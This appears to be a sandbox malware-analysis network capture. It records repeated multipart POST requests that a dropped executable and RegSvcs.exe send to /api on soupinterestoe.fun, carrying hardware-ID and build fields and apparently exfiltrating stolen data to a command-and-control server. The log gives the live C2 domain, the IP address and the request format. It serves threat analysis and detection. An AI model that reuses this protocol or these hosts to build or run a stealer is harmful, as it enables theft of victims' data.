Dec 27, 2023 18:13:08.183187008 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:08.720412970 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=74idk4pmd5ddcgo62mief1krh1; expires=Sun, 21-Apr-2024 10:59:47 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:08 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:08 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:08 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tlDjra%2Bi%2FYlk3ZqpHPpu84CmeXRNVX5O2knMXh7%2BQCsxPqtDj0WfwNrqCaL0XChToD8%2F4WkcgbeEde%2Fw0AhREljDxuXRuVwDoDlTb%2FI1wdlmUulxoRwiD8RDdtq0hJmzlURR3CY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c33 Data Raw: Data Ascii:
Dec 27, 2023 18:13:08.720427036 CET	45	IN	Data Raw: 34 32 38 66 30 36 65 38 35 33 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 428f06e853-DFW15Malformed packet data
Dec 27, 2023 18:13:08.720442057 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49793	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:08.880218029 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:08.880388975 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:09.275008917 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=duej6rcc33nl6l146mij1i5tp3; expires=Sun, 21-Apr-2024 10:59:48 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:09 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:09 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:09 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DE8xpi1qs2hHgy98n7RyOQS213lSeYJYxPwVf%2BoHlr%2BZusq%2FAijbLuh9e%2FuR%2BnItpDMvBixF%2Fm7D%2FZBb2LGt4IUp5uStZ1qC21ymOpeHtOaH3hjJCiViPhZZ2wLYfCIYI0pgEK8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c Data Raw: Data Ascii:
Dec 27, 2023 18:13:09.275021076 CET	47	IN	Data Raw: 33 31 34 36 65 66 32 31 32 63 64 34 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 3146ef212cd4-DFW15Malformed packet data
Dec 27, 2023 18:13:09.275029898 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49794	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:09.068547010 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:09.068597078 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:09.457542896 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=rqk04treq2h57oi4nkborl1lri; expires=Sun, 21-Apr-2024 10:59:48 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:09 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:09 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:09 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dQPMLAzyhge4T8po7mw%2BzYfPubTvjR8%2FyWKbp2%2Bbbjkf7Nxt0NdYunfCIgMCE1gBceEF3NTKjv6uaX3yV%2Bv0CarVfw8Sclq34Ass%2BMJ281gOaJ237uY1dY%2BHQ8BhJUF3yI3iqS4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c33 Data Raw: Data Ascii:
Dec 27, 2023 18:13:09.457565069 CET	45	IN	Data Raw: 34 38 31 38 38 65 61 61 31 63 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 48188eaa1c-DFW15Malformed packet data
Dec 27, 2023 18:13:09.457571983 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49795	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:09.693936110 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:09.693996906 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:10.231903076 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=i4mkfg2pivq2nu0plndeigv8lc; expires=Sun, 21-Apr-2024 10:59:49 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:10 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:10 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:10 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=owHuxA5vYpiVmO9OYZaVQEmDqqansl69rb4lMZvFCQWIZtaod%2FWbybPvrwGLVrKKtGnS6CGvoT5kFDwTyvjq%2FLP1HQDKOf5Rji0XPWk%2F9e%2BiumcyyocRiL6lMQDDhcnEjiQ%2FOXU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c3314 Data Raw: Data Ascii:
Dec 27, 2023 18:13:10.231916904 CET	43	IN	Data Raw: 66 38 34 39 61 61 31 30 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: f849aa10-DFW15Malformed packet data
Dec 27, 2023 18:13:10.231926918 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49796	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:09.849452972 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:09.849710941 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:10.391696930 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=13fh55e97njv2l11tqtt94j0t3; expires=Sun, 21-Apr-2024 10:59:49 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:10 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:10 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:10 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QoEjAj1MPf3YOooZjShrrb71UtmRXWBvAuEQuzuJZwRwUOJbHlct7Vqya%2BmTs0LlOa4L3f2W%2F8sA%2BOdN%2Bm633ofraCjbUxvmPXQ2DJ3bSarq%2F%2Fd2jErFtAyf4PM7gVJxmoJZSJU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c33 Data Raw: Data Ascii:
Dec 27, 2023 18:13:10.391707897 CET	45	IN	Data Raw: 34 63 66 63 36 64 32 63 61 36 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 4cfc6d2ca6-DFW15Malformed packet data
Dec 27, 2023 18:13:10.391719103 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49797	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:10.556531906 CET	366	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 9598 Host: soupinterestoe.fun
Dec 27, 2023 18:13:10.556581974 CET	9598	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:10.941310883 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=e2g3ui2uopp3nb9te9oe7h3idq; expires=Sun, 21-Apr-2024 10:59:49 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:10 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:10 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:10 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E1lQ9HhUKgRCbnnwx%2BoRTPvWeOIL4B912slXeZ38mBgntdwf09VV0zFjdINMWRwQchG1s1Dc1gKTxB07XFR1oADN2TUgEqh9l6yVOxOXzdQK%2F%2BiiOfvx34vrK4LZ9VGcc85E098%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c33151585 Data Raw: Data Ascii:
Dec 27, 2023 18:13:10.941323042 CET	32	IN	Data Raw: 37 32 66 38 2d 44 46 57 0d 0a 0d 0a 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: 72f8-DFWfok 212.102.41.2
Dec 27, 2023 18:13:10.941332102 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49798	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:10.693428040 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:10.693598986 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:11.223784924 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=orglgncku0ho51n49quf0vqf2g; expires=Sun, 21-Apr-2024 10:59:50 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M3037oZ3diEhF7H5jmMIqo6JNJY7rMfARU6z1xHgE137aglazP8rO38s23Bw3tBWv5hBK2IrVgj3q6%2FIR1wCTjWzRgjV9q0nr85t9S0Dz%2Fdtjusw9zE%2F%2BiZy9qaPIn9Vr9xzzC4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331523 Data Raw: Data Ascii:
Dec 27, 2023 18:13:11.223795891 CET	41	IN	Data Raw: 65 63 32 65 35 64 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: ec2e5d-DFW15Malformed packet data
Dec 27, 2023 18:13:11.223805904 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49799	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:11.237705946 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:11.237790108 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:11.805723906 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=5lj7m2ivtmi1ni2rc9dg5vhu55; expires=Sun, 21-Apr-2024 10:59:50 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OQx%2BB4yJZYkCfAiqHl2AiS7AXX5QzZcfi%2FyTbY83TL%2BhFW9ALZ96M6sZpg0seCMNSy9l8pOcg61Gkz0YVNTdHTt67pEXxzWJ9bnhW8HHZyMQBpIcaUxV7R5W%2FVIPwj9DScFui2g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c33155a Data Raw: Data Ascii:
Dec 27, 2023 18:13:11.805740118 CET	41	IN	Data Raw: 61 63 33 30 36 36 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: ac3066-DFW15Malformed packet data
Dec 27, 2023 18:13:11.805749893 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49800	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:12.220698118 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:12.220850945 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
